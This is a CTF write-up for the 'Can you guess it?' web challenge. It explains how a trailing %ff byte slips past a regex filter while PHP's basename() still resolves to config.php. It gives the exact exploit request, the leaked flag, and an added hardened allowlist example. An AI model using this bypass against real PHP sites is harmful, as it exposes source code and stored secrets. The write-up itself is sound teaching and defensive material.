Tags: web basename 

# ▼▼▼Can you guess it?(Web, 338pts, 44/432=10.2%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

※Number of teams that answered one or more questions, **excluding Survey and Welcome**: 218

 ⇒44/218=20.2%

---

## 【Check source code】

```

<html lang="en">
<head>
<meta charset="utf-8">
<title>Can you guess it?</title>
</head>
<body>
<h1>Can you guess it?</h1>

If your guess is correct, I'll give you the flag.


Source


<hr>

<form action="index.php" method="POST">
<input type="text" name="guess">
<input type="submit">
</form>
</body>
</html>
```

`$message = 'Congratulations! The flag is: ' . FLAG;` ⇒ FLAG is likely in config.php

`if (hash_equals($secret, $guess)) {` ⇒ This condition is almost impossible to satisfy

---

```
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}
```

Check the specification of **basename()**

(en)https://www.php.net/manual/en/function.basename.php

(ja)https://www.php.net/manual/ja/function.basename.php

```
Caution
basename() is locale aware, so for it to see the correct basename with multibyte character paths,
the matching locale must be set using the setlocale() function.
```

---

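## 【exploit】

The trailing `%ff` byte keeps the regex from matching at the end of `PHP_SELF`, while `basename()` drops that byte and returns `config.php`, which is then passed to `highlight_file()`.

```
GET /index.php/config.php/%ff?source HTTP/1.1
Host: 3.112.201.75:8003
```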

```
<span>
<span><?php
define</span><span>(</span><span>'FLAG'</span><span>, </span><span>'zer0pts{gu3ss1ng_r4nd0m_by73s_1s_un1n73nd3d_s0lu710n}'</span><span>);</span>
</span>

```

`zer0pts{gu3ss1ng_r4nd0m_by73s_1s_un1n73nd3d_s0lu710n}`
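
The root cause is that the filter inspects the raw `PHP_SELF` string while `highlight_file()` receives `basename(PHP_SELF)`, so the checked value and the used value can differ. The following is an added example, not part of the challenge source, that puts the original pattern beside a hardened one; the function names, the `VIEWABLE` allowlist and the sample paths are assumptions made for illustration.

```php
<?php
// Added example: original check vs. a hardened check for the ?source feature.
// VIEWABLE is an assumed allowlist of files whose source may be displayed.
const VIEWABLE = ['index.php'];

// Original pattern: the deny-list regex runs on the raw request path,
// but the file that gets opened is basename() of that path.
function target_original(string $phpSelf): ?string
{
    if (preg_match('/config\.php\/*$/i', $phpSelf)) {
        return null; // request blocked
    }
    return basename($phpSelf);
}

// Hardened pattern: normalise once, then validate the exact value that
// will be opened against an allowlist instead of a deny-list.
function target_hardened(string $phpSelf): ?string
{
    $name = basename($phpSelf);
    return in_array($name, VIEWABLE, true) ? $name : null;
}

// Constructed sample values of $_SERVER['PHP_SELF'].
$samples = [
    '/index.php',
    '/index.php/config.php',
    '/index.php/config.php/',
    "/index.php/config.php/\xff", // path from the request shown in this writeup
];

foreach ($samples as $s) {
    printf(
        "%-34s original=%-14s hardened=%s\n",
        addcslashes($s, "\x80..\xff"), // show non-ASCII bytes as escapes
        var_export(target_original($s), true),
        var_export(target_hardened($s), true)
    );
}
```

When the page only ever needs to show its own source, `highlight_file(__FILE__)` removes the request-derived path from the decision entirely.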